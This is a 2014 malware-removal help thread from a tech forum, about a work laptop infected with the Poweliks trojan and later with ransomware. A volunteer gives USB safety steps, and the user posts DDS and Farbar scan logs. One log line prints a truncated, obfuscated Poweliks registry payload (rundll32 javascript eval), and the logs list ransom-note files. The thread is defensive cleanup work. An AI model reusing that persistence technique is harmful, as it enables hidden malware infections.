Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Powelik Trojan - Computer scary slow and unresponsive


  • This topic is locked This topic is locked
71 replies to this topic

#1 Shate'

Shate'

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 29 October 2014 - 11:53 AM

From previous First post in 'Am I Infected'

Initially attended to by Broni who escalated

 

"Hello All,

Nice to meet you.

 

I hope you can help me please with an excrutiatingly annoying problem.

 

I have run:

Malwarebytes - found some stuff and deleted

Ran AdwCleaner - found nothing

RanSymantec Endpoint - found nothing but keeps having popups of everything it is 'blocking'  IP addresses etc...

Ran ComboFix - processes returned

Entered Safe Mode and ran RKill (didn't appear to work)and then MBam - as MBam reached the Registry to scan, the COM processes dissapeared, after Reg scan part done, and entered File part, Processes all returned one by one....

Ran RKill again unsuccessfully

Ran Rogue Killer - appeared to have worked,it had discovered the Powelik in the registry section and supposedly it was deleted.  I also had stopped all of the COM processes supposedly successfully.
Then when I came back in this morning, the processes were all back and taking up 79-98% of the memory.

 

Doing ANYTHING is very slow obviously.. so please bear with me.

 

Will someone please help?

Thank you."

 

 

At 12:15 attempted to run DDS  falied with 'The instruction at 0x28b7fff could not be...' and then the computer went to grey screen

12:40  Tried again and after downloading, shut off wireless network button

 

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Professional
Boot Device: \Device\HarddiskVolume1
Install Date: 11/29/2011 8:12:07 AM
System Uptime: 10/29/2014 12:34:36 PM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0TMCVM
Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz | CPU 1 | 2601/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 233 GiB total, 188.726 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID:
Description:
Device ID: ACPI\SMO8800\1
Manufacturer:
Name:
PNP Device ID: ACPI\SMO8800\1
Service:
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Cisco Systems VPN Adapter
Device ID: ROOT\NET\0000
Manufacturer: Cisco Systems
Name: Cisco Systems VPN Adapter
PNP Device ID: ROOT\NET\0000
Service: CVirtA
.
==== System Restore Points ===================
.
RP151: 10/8/2014 1:59:57 PM - Scheduled Checkpoint
RP152: 10/16/2014 12:00:56 PM - Windows Update
RP153: 10/16/2014 12:03:12 PM - Windows Update
RP154: 10/16/2014 12:03:56 PM - Windows Update
RP155: 10/16/2014 12:05:00 PM - Windows Update
RP156: 10/16/2014 12:05:50 PM - Windows Update
RP157: 10/16/2014 12:06:56 PM - Windows Update
RP158: 10/16/2014 12:09:58 PM - Windows Update
RP159: 10/16/2014 12:11:43 PM - Windows Update
RP160: 10/16/2014 12:13:56 PM - Windows Update
RP161: 10/17/2014 8:03:25 AM - Windows Update
RP162: 10/17/2014 9:01:47 AM - Windows Update
.
==== Image File Execution Options =============
.
.
==== Installed Programs ======================
.
.
==== End Of File ===========================
 

 

Again this is only with the netork disabled.  with it on, there are multiple COM Surrogate or Windows Explorer instances



BC AdBot (Login to Remove)

 


#2 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 30 October 2014 - 09:23 AM

Does someone please have some time to help me with this?



#3 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 01 November 2014 - 03:18 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#4 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 01 November 2014 - 08:31 AM

Hi Georgi

Thank you so much for replying. The computer in question is for an end user at work, so I won't be back until monday now. Can we please continue then?

Also, it has now been attacked by ransomeware that encrypted all files. The IT Director does not want it on the network any longer. Is it possible to download these tools to a flash drive and perform the steps you request?

Thank you so much again for your reply and time!

Shate'

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 02 November 2014 - 10:36 AM

Hi Shate,

 

Thank you so much for replying. The computer in question is for an end user at work, so I won't be back until monday now. Can we please continue then?

 

Yes, of course. :)

 

Is it possible to download these tools to a flash drive and perform the steps you request?

 

Sure. However keep in mind to take some measures for your safety:

 

 

1. 1. First make sure that you disable Autorun on your and the other computers in the network:

 

How to disable the Autorun functionality in Windows

 

2.1 It's a good idea to immunize the computer against future autorun threats.

You can download and run the following version of Panda USBVaccine

Click on the Vaccinate Computer button (It should now show a green checkmark and provide the confirmation Computer vaccinated) then close the tool. You can vaccinate your USB drive as well.

 

2.2. Another way is to use USBFix. You can download the tool from here...make sure that your flash drive is connected to the computer.

Run the tool and press the Vaccinate and wait for the process to complete. This will vaccinate all of the drives on the computer (including the flash drive) against autorun threats. Next click on the Deletion button to scan and clean the flash drive for malware remnants (you can also open My Computer, right click on the flash drive's letter from the context menu and scan it with your installed antivirus software without open the USB stick yet until the scan guarantee the flash drive is completely clean) or better format it to be sure the flash drive is malware free (if you wish so). Keep in mind that if you format it you will need to re-apply the immunization described above.

 

3. Finally if your antivirus softwate don't offer the removable media to be scanned when plugged in (instead of scanning the flash drive with right click on the flash drive letter) then you can install the following software - MCShield 3 It will monitor in real-time for any threats that can spread via USB drives. The tool is light on system resources and it's compatible with the installed antivirus software.

 

Regards,

Georgi


cXfZ4wS.png


#6 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 03 November 2014 - 12:37 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 02-11-2014
Ran by ScalaC (administrator) on NY01L209 on 03-11-2014 11:35:55
Running from C:\Users\scalac\Desktop
Loaded Profile: ScalaC (Available profiles: Administrator & ScalaC)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Cisco Systems, Inc.) C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe
(HP) C:\Windows\System32\HPSIsvc.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Smc.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\wfcrun32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [505720 2011-07-20] (Alps Electric Co., Ltd.)
HKLM\...\Run: [DtermSP30Auto] => C:\Windows\system32\wscript.exe //T:300 "C:\Program Files\NEC\SP350\StartupScript.js"
HKLM\...\Run: [ConnectionCenter] => C:\Program Files\Citrix\ICA Client\concentr.exe [309184 2012-03-28] (Citrix Systems, Inc.)
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\System32\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-20\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4826904 2014-10-29] (Piriform Ltd)
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-18\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL (Symantec Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 10.33.32.34 10.33.32.190 4.2.2.2

FireFox:
========
FF ProfilePath: C:\Users\scalac\AppData\Roaming\Mozilla\Firefox\Profiles\izvhwsf0.default
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: OpenDownload² - C:\Users\scalac\AppData\Roaming\Mozilla\Firefox\Profiles\izvhwsf0.default\Extensions\{210249CE-F888-11DD-B868-4CB456D89593} [2014-10-23]
FF HKLM\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF
FF Extension: Symantec Vulnerability Protection - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF [2014-08-29]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AeXNSClient; C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe [2122144 2014-09-10] (Symantec Corporation)
S3 AltirisAgentProvider; C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe [634288 2014-09-10] (Symantec Corporation)
R2 CVPND; C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe [1528616 2010-09-27] (Cisco Systems, Inc.)
S4 O2FLASH; C:\Windows\system32\DRIVERS\o2flash.exe [72296 2010-02-10] (O2Micro International)
R2 SepMasterService; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-08-11] (Symantec Corporation)
R3 SmcService; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Smc.exe [1746696 2014-08-11] (Symantec Corporation)
S3 SNAC; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\snac.exe [289136 2014-08-11] (Symantec Corporation)
S4 SP350.PriorityPolicer; C:\Program Files\NEC\SP350\PriorityPolicer.exe [58880 2012-03-14] (NEC Corporation) [File not signed]
S3 workfolderssvc; C:\Windows\system32\workfolderssvc.dll [1242112 2014-04-08] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-07-22] (ST Microelectronics)
R1 BHDrvx86; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx86.sys [1137368 2014-10-08] (Symantec Corporation)
R1 ccSettings_{27226ED0-B7A0-49E4-82DE-02FF10AC5C5A}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\ccSetx86.sys [134744 2014-08-11] (Symantec Corporation)
S3 CVirtA; C:\Windows\System32\DRIVERS\CVirtA.sys [5275 2007-01-18] (Cisco Systems, Inc.)
R2 CVPNDRVA; C:\Windows\system32\Drivers\CVPNDRVA.sys [308859 2010-09-27] (Cisco Systems, Inc.) [File not signed]
R3 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-09-09] (Symantec Corporation)
R1 IDSVix86; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141031.011\IDSvix86.sys [395992 2014-10-24] (Symantec Corporation)
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [75480 2014-10-30] (Malwarebytes Corporation)
R3 MEI; C:\Windows\System32\DRIVERS\HECI.sys [41088 2010-10-19] (Intel Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141102.024\NAVENG.SYS [95704 2014-10-22] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141102.024\NAVEX15.SYS [1636696 2014-10-22] (Symantec Corporation)
R3 O2MDRRDR; C:\Windows\System32\DRIVERS\O2MDRw7.sys [62440 2011-01-04] (O2Micro )
R3 O2SDJRDR; C:\Windows\System32\DRIVERS\o2sdjw7.sys [63976 2011-03-23] (O2Micro )
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SRTSP.SYS [657112 2014-08-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SRTSPX.SYS [32344 2014-08-11] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyDvCtrl32.sys [29216 2014-08-11] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMDS.SYS [367704 2014-08-11] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMEFA.SYS [936152 2014-08-11] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [142936 2014-08-28] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\Ironx86.SYS [175832 2014-08-11] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMNETS.SYS [342232 2014-08-11] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [128096 2014-08-29] (Symantec Corporation)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [37064 2013-01-10] (Anchorfree Inc.)
R1 Teefer2; C:\Windows\System32\DRIVERS\Teefer.sys [81824 2014-08-11] (Symantec Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-31] ()

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 11:35 - 2014-11-03 11:36 - 00014578 _____ () C:\Users\scalac\Desktop\FRST.txt
2014-11-03 11:35 - 2014-11-03 11:36 - 00000000 ____D () C:\FRST
2014-11-03 11:33 - 2014-11-03 11:34 - 01106432 _____ (Farbar) C:\Users\scalac\Desktop\FRST.exe
2014-10-30 20:14 - 2014-10-30 20:14 - 258747023 _____ () C:\Windows\MEMORY.DMP
2014-10-30 20:14 - 2014-10-30 20:14 - 00142048 _____ () C:\Windows\Minidump\103014-97687-01.dmp
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Downloads\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Documents\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL
